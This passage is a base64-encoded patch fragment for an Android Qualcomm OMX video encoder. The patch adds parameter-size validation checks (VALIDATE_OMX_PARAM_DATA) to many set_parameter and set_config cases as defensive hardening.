hfVklERU9fUEFSQU1fRVJST1JDT1JSRUNUSU9OVFlQRSopcGFyYW1EYXRhOwpAQCAtMTExNyw2ICsxMTMzLDcgQEAKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfSW5kZXhQYXJhbVZpZGVvSW50cmFSZWZyZXNoOgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgT01YX1ZJREVPX1BBUkFNX0lOVFJBUkVGUkVTSFRZUEUpOwogICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygic2V0X3BhcmFtOk9NWF9JbmRleFBhcmFtVmlkZW9JbnRyYVJlZnJlc2giKTsKICAgICAgICAgICAgICAgICBPTVhfVklERU9fUEFSQU1fSU5UUkFSRUZSRVNIVFlQRSogcFBhcmFtID0KICAgICAgICAgICAgICAgICAgICAgKE9NWF9WSURFT19QQVJBTV9JTlRSQVJFRlJFU0hUWVBFKilwYXJhbURhdGE7CkBAIC0xMTMwLDYgKzExNDcsNyBAQAogI2lmZGVmIF9BTkRST0lEX0lDU18KICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4UGFyYW1WaWRlb01ldGFCdWZmZXJNb2RlOgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgU3RvcmVNZXRhRGF0YUluQnVmZmVyc1BhcmFtcyk7CiAgICAgICAgICAgICAgICAgU3RvcmVNZXRhRGF0YUluQnVmZmVyc1BhcmFtcyAqcFBhcmFtID0KICAgICAgICAgICAgICAgICAgICAgKFN0b3JlTWV0YURhdGFJbkJ1ZmZlcnNQYXJhbXMqKXBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9ISUdIKCJzZXRfcGFyYW1ldGVyOk9NWF9RY29tSW5kZXhQYXJhbVZpZGVvTWV0YUJ1ZmZlck1vZGU6ICIKQEAgLTExNzYsNiArMTE5NCw3IEBACiAjaWYgIWRlZmluZWQoTUFYX1JFU183MjBQKSB8fCBkZWZpbmVkKF9NU004OTc0XykKICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4UGFyYW1JbmRleEV4dHJhRGF0YVR5cGU6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBRT01YX0lOREVYRVhUUkFEQVRBVFlQRSk7CiAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfSElHSCgic2V0X3BhcmFtZXRlcjogT01YX1Fjb21JbmRleFBhcmFtSW5kZXhFeHRyYURhdGFUeXBlIik7CiAgICAgICAgICAgICAgICAgUU9NWF9JTkRFWEVYVFJBREFUQVRZUEUgKnBQYXJhbSA9IChRT01YX0lOREVYRVhUUkFEQVRBVFlQRSAqKXBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICBib29sIGVuYWJsZSA9IGZhbHNlOwpAQCAtMTI1Niw2ICsxMjc1LDcgQEAKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBRT01YX0luZGV4UGFyYW1WaWRlb0xUUk1vZGU6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBRT01YX1ZJREVPX1BBUkFNX0xUUk1PREVfVFlQRSk7CiAgICAgICAgICAgICAgICAgUU9NWF9WSURFT19QQVJBTV9MVFJNT0RFX1RZUEUqIHBQYXJhbSA9CiAgICAgICAgICAgICAgICAgICAgIChRT01YX1ZJREVPX1BBUkFNX0xUUk1PREVfVFlQRSopcGFyYW1EYXRhOwogICAgICAgICAgICAgICAgIGlmICghaGFuZGxlLT52ZW5jX3NldF9wYXJhbShwYXJhbURhdGEsIChPTVhfSU5ERVhUWVBFKVFPTVhfSW5kZXhQYXJhbVZpZGVvTFRSTW9kZSkpIHsKQEAgLTEyNjcsNiArMTI4Nyw3IEBACiAgICAgICAgICAgICB9CiAgICAgICAgIGNhc2UgUU9NWF9JbmRleFBhcmFtVmlkZW9MVFJDb3VudDoKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIFFPTVhfVklERU9fUEFSQU1fTFRSQ09VTlRfVFlQRSk7CiAgICAgICAgICAgICAgICAgUU9NWF9WSURFT19QQVJBTV9MVFJDT1VOVF9UWVBFKiBwUGFyYW0gPQogICAgICAgICAgICAgICAgICAgICAoUU9NWF9WSURFT19QQVJBTV9MVFJDT1VOVF9UWVBFKilwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgaWYgKCFoYW5kbGUtPnZlbmNfc2V0X3BhcmFtKHBhcmFtRGF0YSwgKE9NWF9JTkRFWFRZUEUpUU9NWF9JbmRleFBhcmFtVmlkZW9MVFJDb3VudCkpIHsKQEAgLTEyNzksNiArMTMwMCw3IEBACiAjZW5kaWYKICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4UGFyYW1WaWRlb01heEFsbG93ZWRCaXRyYXRlQ2hlY2s6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBRT01YX0VYVE5JTkRFWF9QQVJBTVRZUEUpOwogICAgICAgICAgICAgICAgIFFPTVhfRVhUTklOREVYX1BBUkFNVFlQRSogcFBhcmFtID0KICAgICAgICAgICAgICAgICAgICAgKFFPTVhfRVhUTklOREVYX1BBUkFNVFlQRSopcGFyYW1EYXRhOwogICAgICAgICAgICAgICAgIGlmIChwUGFyYW0tPm5Qb3J0SW5kZXggPT0gUE9SVF9JTkRFWF9PVVQpIHsKQEAgLTEyOTYsNiArMTMxOCw3IEBACiAjaWZkZWYgTUFYX1JFU18xMDgwUAogICAgICAgICBjYXNlIE9NWF9RY29tSW5kZXhFbmFibGVTbGljZURlbGl2ZXJ5TW9kZToKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIFFPTVhfRVhUTklOREVYX1BBUkFNVFlQRSk7CiAgICAgICAgICAgICAgICAgUU9NWF9FWFROSU5ERVhfUEFSQU1UWVBFKiBwUGFyYW0gPQogICAgICAgICAgICAgICAgICAgICAoUU9NWF9FWFROSU5ERVhfUEFSQU1UWVBFKilwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgaWYgKHBQYXJhbS0+blBvcnRJbmRleCA9PSBQT1JUX0lOREVYX09VVCkgewpAQCAtMTMxNCw2ICsxMzM3LDcgQEAKICNlbmRpZgogICAgICAgICBjYXNlIE9NWF9RY29tSW5kZXhFbmFibGVIMjYzUGx1c1BUeXBlOgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgUU9NWF9FWFROSU5ERVhfUEFSQU1UWVBFKTsKICAgICAgICAgICAgICAgICBRT01YX0VYVE5JTkRFWF9QQVJBTVRZUEUqIHBQYXJhbSA9CiAgICAgICAgICAgICAgICAgICAgIChRT01YX0VYVE5JTkRFWF9QQVJBTVRZUEUqKXBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coIk9NWF9RY29tSW5kZXhFbmFibGVIMjYzUGx1c1BUeXBlIik7CkBAIC0xMzMyLDYgKzEzNTYsNyBAQAogICAgICAgICAgICAgfQogICAgICAgICBjYXNlIE9NWF9RY29tSW5kZXhQYXJhbVNlcXVlbmNlSGVhZGVyV2l0aElEUjoKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIFByZXBlbmRTUFNQUFNUb0lEUkZyYW1lc1BhcmFtcyk7CiAgICAgICAgICAgICAgICAgaWYoIWhhbmRsZS0+dmVuY19zZXRfcGFyYW0ocGFyYW1EYXRhLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgIChPTVhfSU5ERVhUWVBFKU9NWF9RY29tSW5kZXhQYXJhbVNlcXVlbmNlSGVhZGVyV2l0aElEUikpIHsKICAgICAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfRVJST1IoIiVzOiAlcyIsCkBAIC0xMzQzLDYgKzEzNjgsNyBAQAogICAgICAgICAgICAgfQogICAgICAgICBjYXNlIE9NWF9RY29tSW5kZXhQYXJhbUgyNjRBVURlbGltaXRlcjoKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9RQ09NX1ZJREVPX0NPTkZJR19IMjY0X0FVRCk7CiAgICAgICAgICAgICAgICAgaWYoIWhhbmRsZS0+dmVuY19zZXRfcGFyYW0ocGFyYW1EYXRhLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgIChPTVhfSU5ERVhUWVBFKU9NWF9RY29tSW5kZXhQYXJhbUgyNjRBVURlbGltaXRlcikpIHsKICAgICAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfRVJST1IoIiVzOiAlcyIsCkBAIC0xMzU0LDYgKzEzODAsNyBAQAogICAgICAgICAgICAgfQogICAgICAgIGNhc2UgT01YX1Fjb21JbmRleEhpZXJhcmNoaWNhbFN0cnVjdHVyZToKICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgUU9NWF9WSURFT19ISUVSQVJDSElDQUxMQVlFUlMpOwogICAgICAgICAgICAgICAgIFFPTVhfVklERU9fSElFUkFSQ0hJQ0FMTEFZRVJTKiBwUGFyYW0gPQogICAgICAgICAgICAgICAgICAgICAoUU9NWF9WSURFT19ISUVSQVJDSElDQUxMQVlFUlMqKXBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coIk9NWF9RY29tSW5kZXhIaWVyYXJjaGljYWxTdHJ1Y3R1cmUiKTsKQEAgLTEzNzcsNiArMTQwNCw3IEBACiAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4UGFyYW1QZXJmTGV2ZWw6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfUUNPTV9WSURFT19QQVJBTV9QRVJGX0xFVkVMKTsKICAgICAgICAgICAgICAgICBpZiAoIWhhbmRsZS0+dmVuY19zZXRfcGFyYW0ocGFyYW1EYXRhLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgIChPTVhfSU5ERVhUWVBFKSBPTVhfUWNvbUluZGV4UGFyYW1QZXJmTGV2ZWwpKSB7CiAgICAgICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0VSUk9SKCJFUlJPUjogU2V0dGluZyBwZXJmb3JtYW5jZSBsZXZlbCIpOwpAQCAtMTM4Niw2ICsxNDE0LDcgQEAKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4UGFyYW1IMjY0VlVJVGltaW5nSW5mbzoKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9RQ09NX1ZJREVPX1BBUkFNX1ZVSV9USU1JTkdfSU5GTyk7CiAgICAgICAgICAgICAgICAgaWYgKCFoYW5kbGUtPnZlbmNfc2V0X3BhcmFtKHBhcmFtRGF0YSwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAoT01YX0lOREVYVFlQRSkgT01YX1Fjb21JbmRleFBhcmFtSDI2NFZVSVRpbWluZ0luZm8pKSB7CiAgICAgICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0VSUk9SKCJFUlJPUjogU2V0dGluZyBWVUkgdGltaW5nIGluZm8iKTsKQEAgLTEzOTUsNiArMTQyNCw3IEBACiAgICAgICAgICAgICB9CiAgICAgICAgIGNhc2UgT01YX1Fjb21JbmRleFBhcmFtUGVha0JpdHJhdGU6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfUUNPTV9WSURFT19QQVJBTV9QRUFLX0JJVFJBVEUpOwogICAgICAgICAgICAgICAgIGlmICghaGFuZGxlLT52ZW5jX3NldF9wYXJhbShwYXJhbURhdGEsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKE9NWF9JTkRFWFRZUEUpIE9NWF9RY29tSW5kZXhQYXJhbVBlYWtCaXRyYXRlKSkgewogICAgICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9FUlJPUigiRVJST1I6IFNldHRpbmcgcGVhayBiaXRyYXRlIik7CkBAIC0xNDA0LDYgKzE0MzQsNyBAQAogICAgICAgICAgICAgIH0KICAgICAgICBjYXNlIFFPTVhfSW5kZXhQYXJhbVZpZGVvSW5pdGlhbFFwOgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgUU9NWF9FWFROSU5ERVhfVklERU9fSU5JVElBTFFQKTsKICAgICAgICAgICAgICAgICBpZighaGFuZGxlLT52ZW5jX3NldF9wYXJhbShwYXJhbURhdGEsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKE9NWF9JTkRFWFRZUEUpUU9NWF9JbmRleFBhcmFtVmlkZW9Jbml0aWFsUXApKSB7CiAgICAgICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0VSUk9SKCJSZXF1ZXN0IHRvIEVuYWJsZSBpbml0aWFsIFFQIGZhaWxlZCIpOwpAQCAtMTQyMyw2ICsxNDU0LDcgQEAKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4UGFyYW1WaWRlb0h5YnJpZEhpZXJwTW9kZToKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIFFPTVhfRVhUTklOREVYX1ZJREVPX0hZQlJJRF9IUF9NT0RFKTsKICAgICAgICAgICAgICAgIGlmKCFoYW5kbGUtPnZlbmNfc2V0X3BhcmFtKHBhcmFtRGF0YSwKICAgICAgICAgICAgICAgICAgICAgICAgICAoT01YX0lOREVYVFlQRSlPTVhfUWNvbUluZGV4UGFyYW1WaWRlb0h5YnJpZEhpZXJwTW9kZSkpIHsKICAgICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9FUlJPUigiUmVxdWVzdCB0byBFbmFibGUgSHlicmlkIEhpZXItUCBmYWlsZWQiKTsKQEAgLTE1MjcsNiArMTU1OSw3IEBACiAgICAgc3dpdGNoICgoaW50KWNvbmZpZ0luZGV4KSB7CiAgICAgICAgIGNhc2UgT01YX0luZGV4Q29uZmlnVmlkZW9CaXRyYXRlOgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKGNvbmZpZ0RhdGEsIE9NWF9WSURFT19DT05GSUdfQklUUkFURVRZUEUpOwogICAgICAgICAgICAgICAgIE9NWF9WSURFT19DT05GSUdfQklUUkFURVRZUEUqIHBQYXJhbSA9CiAgICAgICAgICAgICAgICAgICAgIHJlaW50ZXJwcmV0X2Nhc3Q8T01YX1ZJREVPX0NPTkZJR19CSVRSQVRFVFlQRSo+KGNvbmZpZ0RhdGEpOwogICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0hJR0goInNldF9jb25maWcoKTogT01YX0luZGV4Q29uZmlnVmlkZW9CaXRyYXRlICgldSkiLCAodW5zaWduZWQgaW50KXBQYXJhbS0+bkVuY29kZUJpdHJhdGUpOwpAQCAtMTU0OCw2ICsxNTgxLDcgQEAKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfSW5kZXhDb25maWdWaWRlb0ZyYW1lcmF0ZToKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShjb25maWdEYXRhLCBPTVhfQ09ORklHX0ZSQU1FUkFURVRZUEUpOwogICAgICAgICAgICAgICAgIE9NWF9DT05GSUdfRlJBTUVSQVRFVFlQRSogcFBhcmFtID0KICAgICAgICAgICAgICAgICAgICAgcmVpbnRlcnByZXRfY2FzdDxPTVhfQ09ORklHX0ZSQU1FUkFURVRZUEUqPihjb25maWdEYXRhKTsKICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9ISUdIKCJzZXRfY29uZmlnKCk6IE9NWF9JbmRleENvbmZpZ1ZpZGVvRnJhbWVyYXRlICgweCV4KSIsICh1bnNpZ25lZCBpbnQpcFBhcmFtLT54RW5jb2RlRnJhbWVyYXRlKTsKQEAgLTE1NzAsNiArMTYwNCw3IEBACiAgICAgICAgICAgICB9CiAgICAgICAgIGNhc2UgUU9NWF9JbmRleENvbmZpZ1ZpZGVvSW50cmFwZXJpb2Q6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEoY29uZmlnRGF0YSwgUU9NWF9WSURFT19JTlRSQVBFUklPRFRZUEUpOwogICAgICAgICAgICAgICAgIFFPTVhfVklERU9fSU5UUkFQRVJJT0RUWVBFKiBwUGFyYW0gPQogICAgICAgICAgICAgICAgICAgICByZWludGVycHJldF9jYXN0PFFPTVhfVklERU9fSU5UUkFQRVJJT0RUWVBFKj4oY29uZmlnRGF0YSk7CiAKQEAgLTE2MjcsNiArMTY2Miw3IEBACiAKICAgICAgICAgY2FzZSBPTVhfSW5kZXhDb25maWdWaWRlb0ludHJhVk9QUmVmcmVzaDoKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShjb25maWdEYXRhLCBPTVhfQ09ORklHX0lOVFJBUkVGUkVTSFZPUFRZUEUpOwogICAgICAgICAgICAgICAgIE9NWF9DT05GSUdfSU5UUkFSRUZSRVNIVk9QVFlQRSogcFBhcmFtID0KICAgICAgICAgICAgICAgICAgICAgcmVpbnRlcnByZXRfY2FzdDxPTVhfQ09ORklHX0lOVFJBUkVGUkVTSFZPUFRZUEUqPihjb25maWdEYXRhKTsKIApAQCAtMTY0OCw2ICsxNjg0LDcgQEAKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfSW5kZXhDb25maWdDb21tb25Sb3RhdGU6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEoY29uZmlnRGF0YSwgT01YX0NPTkZJR19ST1RBVElPTlRZUEUpOwogICAgICAgICAgICAgICAgIE9NWF9DT05GSUdfUk9UQVRJT05UWVBFICpwUGFyYW0gPQogICAgICAgICAgICAgICAgICAgICByZWludGVycHJldF9jYXN0PE9NWF9DT05GSUdfUk9UQVRJT05UWVBFKj4oY29uZmlnRGF0YSk7CiAgICAgICAgICAgICAgICAgT01YX1MzMiBuUm90YXRpb247CkBAIC0xNjk1LDYgKzE3MzIsNyBAQAogICAgICAgICAgICAgewogICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0hJR0goInNldF9jb25maWcoKTogT01YX1Fjb21JbmRleENvbmZpZ1ZpZGVvRnJhbWVQYWNraW5nQXJyYW5nZW1lbnQiKTsKICAgICAgICAgICAgICAgICBpZiAobV9zT3V0UG9ydEZvcm1hdC5lQ29tcHJlc3Npb25Gb3JtYXQgPT0gT01YX1ZJREVPX0NvZGluZ0FWQykgeworICAgICAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShjb25maWdEYXRhLCBPTVhfUUNPTV9GUkFNRV9QQUNLX0FSUkFOR0VNRU5UKTsKICAgICAgICAgICAgICAgICAgICAgT01YX1FDT01fRlJBTUVfUEFDS19BUlJBTkdFTUVOVCAqY29uZmlnRm10ID0KICAgICAgICAgICAgICAgICAgICAgICAgIChPTVhfUUNPTV9GUkFNRV9QQUNLX0FSUkFOR0VNRU5UICopIGNvbmZpZ0RhdGE7CiAgICAgICAgICAgICAgICAgICAgIGV4dHJhX2RhdGFfaGFuZGxlLnNldF9mcmFtZV9wYWNrX2RhdGEoY29uZmlnRm10KTsKQEAgLTE3MDUsNiArMTc0Myw3IEBACiAgICAgICAgICAgICB9CiAgICAgICAgIGNhc2UgUU9NWF9JbmRleENvbmZpZ1ZpZGVvTFRSUGVyaW9kOgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKGNvbmZpZ0RhdGEsIFFPTVhfVklERU9fQ09ORklHX0xUUlBFUklPRF9UWVBFKTsKICAgICAgICAgICAgICAgICBRT01YX1ZJREVPX0NPTkZJR19MVFJQRVJJT0RfVFlQRSogcFBhcmFtID0gKFFPTVhfVklERU9fQ09ORklHX0xUUlBFUklPRF9UWVBFKiljb25maWdEYXRhOwogICAgICAgICAgICAgICAgIGlmICghaGFuZGxlLT52ZW5jX3NldF9jb25maWcoY29uZmlnRGF0YSwgKE9NWF9JTkRFWFRZUEUpUU9NWF9JbmRleENvbmZpZ1ZpZGVvTFRSUGVyaW9kKSkgewogICAgICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9FUlJPUigiRVJST1I6IFNldHRpbmcgTFRSIHBlcmlvZCBmYWlsZWQiKTsKQEAgLTE3MTYsNiArMTc1NSw3IEBACiAKICAgICAgICBjYXNlIE9NWF9JbmRleENvbmZpZ1ZpZGVvVnA4UmVmZXJlbmNlRnJhbWU6CiAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShjb25maWdEYXRhLCBPTVhfVklERU9fVlA4UkVGRVJFTkNFRlJBTUVUWVBFKTsKICAgICAgICAgICAgICAgIE9NWF9WSURFT19WUDhSRUZFUkVOQ0VGUkFNRVRZUEUqIHBQYXJhbSA9IChPTVhfVklERU9fVlA4UkVGRVJFTkNFRlJBTUVUWVBFKikgY29uZmlnRGF0YTsKICAgICAgICAgICAgICAgIGlmICghaGFuZGxlLT52ZW5jX3NldF9jb25maWcocFBhcmFtLCAoT01YX0lOREVYVFlQRSkgT01YX0luZGV4Q29uZmlnVmlkZW9WcDhSZWZlcmVuY2VGcmFtZSkpIHsKICAgICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9FUlJPUigiRVJST1I6IFNldHRpbmcgVlA4IHJlZmVyZW5jZSBmcmFtZSIpOwpAQCAtMTcyNyw2ICsxNzY3LDcgQEAKIAogICAgICAgICBjYXNlIFFPTVhfSW5kZXhDb25maWdWaWRlb0xUUlVzZToKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShjb25maWdEYXRhLCBRT01YX1ZJREVPX0NPTkZJR19MVFJVU0VfVFlQRSk7CiAgICAgICAgICAgICAgICAgUU9NWF9WSURFT19DT05GSUdfTFRSVVNFX1RZUEUqIHBQYXJhbSA9IChRT01YX1ZJREVPX0NPTkZJR19MVFJVU0VfVFlQRSopY29uZmlnRGF0YTsKICAgICAgICAgICAgICAgICBpZiAoIWhhbmRsZS0+dmVuY19zZXRfY29uZmlnKHBQYXJhbSwgKE9NWF9JTkRFWFRZUEUpUU9NWF9JbmRleENvbmZpZ1ZpZGVvTFRSVXNlKSkgewogICAgICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9FUlJPUigiRVJST1I6IFNldHRpbmcgTFRSIHVzZSBmYWlsZWQiKTsKQEAgLTE3MzcsNiArMTc3OCw3IEBACiAgICAgICAgICAgICB9CiAgICAgICAgIGNhc2UgUU9NWF9JbmRleENvbmZpZ1ZpZGVvTFRSTWFyazoKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShjb25maWdEYXRhLCBRT01YX1ZJREVPX0NPTkZJR19MVFJNQVJLX1RZUEUpOwogICAgICAgICAgICAgICAgIFFPTVhfVklERU9fQ09ORklHX0xUUk1BUktfVFlQRSogcFBhcmFtID0gKFFPTVhfVklERU9fQ09ORklHX0xUUk1BUktfVFlQRSopY29uZmlnRGF0YTsKICAgICAgICAgICAgICAgICBpZiAoIWhhbmRsZS0+dmVuY19zZXRfY29uZmlnKHBQYXJhbSwgKE9NWF9JTkRFWFRZUEUpUU9NWF9JbmRleENvbmZpZ1ZpZGVvTFRSTWFyaykpIHsKICAgICAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfRVJST1IoIkVSUk9SOiBTZXR0aW5nIExUUiBtYXJrIGZhaWxlZCIpOwpAQCAtMTc0Niw2ICsxNzg4LDcgQEAKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfSW5kZXhDb25maWdWaWRlb0FWQ0ludHJhUGVyaW9kOgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKGNvbmZpZ0RhdGEsIE9NWF9WSURFT19DT05GSUdfQVZDSU5UUkFQRVJJT0QpOwogICAgICAgICAgICAgICAgIE9NWF9WSURFT19DT05GSUdfQVZDSU5UUkFQRVJJT0QgKnBQYXJhbSA9IChPTVhfVklERU9fQ09ORklHX0FWQ0lOVFJBUEVSSU9EKikgY29uZmlnRGF0YTsKICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coInNldF9jb25maWc6IE9NWF9JbmRleENvbmZpZ1ZpZGVvQVZDSW50cmFQZXJpb2QiKTsKICAgICAgICAgICAgICAgICBpZiAoIWhhbmRsZS0+dmVuY19zZXRfY29uZmlnKHBQYXJhbSwgKE9NWF9JTkRFWFRZUEUpT01YX0luZGV4Q29uZmlnVmlkZW9BVkNJbnRyYVBlcmlvZCkpIHsKQEAgLTE3NTcsNiArMTgwMCw3IEBACiAgICAgICAgICAgICB9CiAgICAgICAgIGNhc2UgT01YX0luZGV4Q29uZmlnQ29tbW9uRGVpbnRlcmxhY2U6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEoY29uZmlnRGF0YSwgT01YX1ZJREVPX0NPTkZJR19ERUlOVEVSTEFDRSk7CiAgICAgICAgICAgICAgICAgT01YX1ZJREVPX0NPTkZJR19ERUlOVEVSTEFDRSAqcFBhcmFtID0gKE9NWF9WSURFT19DT05GSUdfREVJTlRFUkxBQ0UqKSBjb25maWdEYXRhOwogICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygic2V0X2NvbmZpZzogT01YX0luZGV4Q29uZmlnQ29tbW9uRGVpbnRlcmxhY2UiKTsKICAgICAgICAgICAgICAgICBpZiAoIWhhbmRsZS0+dmVuY19zZXRfY29uZmlnKHBQYXJhbSwgKE9NWF9JTkRFWFRZUEUpT01YX0luZGV4Q29uZmlnQ29tbW9uRGVpbnRlcmxhY2UpKSB7CkBAIC0xNzY4LDYgKzE4MTIsNyBAQAogICAgICAgICAgICAgfQogICAgICAgICBjYXNlIE9NWF9RY29tSW5kZXhDb25maWdWaWRlb1ZlbmNQZXJmTW9kZToKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShjb25maWdEYXRhLCBRT01YX0VYVE5JTkRFWF9WSURFT19QRVJGTU9ERSk7CiAgICAgICAgICAgICAgICAgUU9NWF9FWFROSU5ERVhfVklERU9fUEVSRk1PREUqIHBQYXJhbSA9IChRT01YX0VYVE5JTkRFWF9WSURFT19QRVJGTU9ERSopY29uZmlnRGF0YTsKICAgICAgICAgICAgICAgICBpZiAoIWhhbmRsZS0+dmVuY19zZXRfY29uZmlnKHBQYXJhbSwgKE9NWF9JTkRFWFRZUEUpT01YX1Fjb21JbmRleENvbmZpZ1ZpZGVvVmVuY1BlcmZNb2RlKSkgewogICAgICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9FUlJPUigiRVJST1I6IFNldHRpbmcgT01YX1Fjb21JbmRleENvbmZpZ1ZpZGVvVmVuY1BlcmZNb2RlIGZhaWxlZCIpOwpAQCAtMTc3Nyw2ICsxODIyLDcgQEAKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfSW5kZXhDb25maWdQcmlvcml0eToKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShjb25maWdEYXRhLCBPTVhfUEFSQU1fVTMyVFlQRSk7CiAgICAgICAgICAgICAgICAgaWYgKCFoYW5kbGUtPnZlbmNfc2V0X2NvbmZpZyhjb25maWdEYXRhLCAoT01YX0lOREVYVFlQRSlPTVhfSW5kZXhDb25maWdQcmlvcml0eSkpIHsKICAgICAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfRVJST1IoIkZhaWxlZCB0byBzZXQgT01YX0luZGV4Q29uZmlnUHJpb3JpdHkiKTsKICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIE9NWF9FcnJvclVuc3VwcG9ydGVkU2V0dGluZzsKQEAgLTE3ODUsNiArMTgzMSw3IEBACiAgICAgICAgICAgICB9CiAgICAgICAgIGNhc2UgT01YX0luZGV4Q29uZmlnT3BlcmF0aW5nUmF0ZToKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShjb25maWdEYXRhLCBPTVhfUEFSQU1fVTMyVFlQRSk7C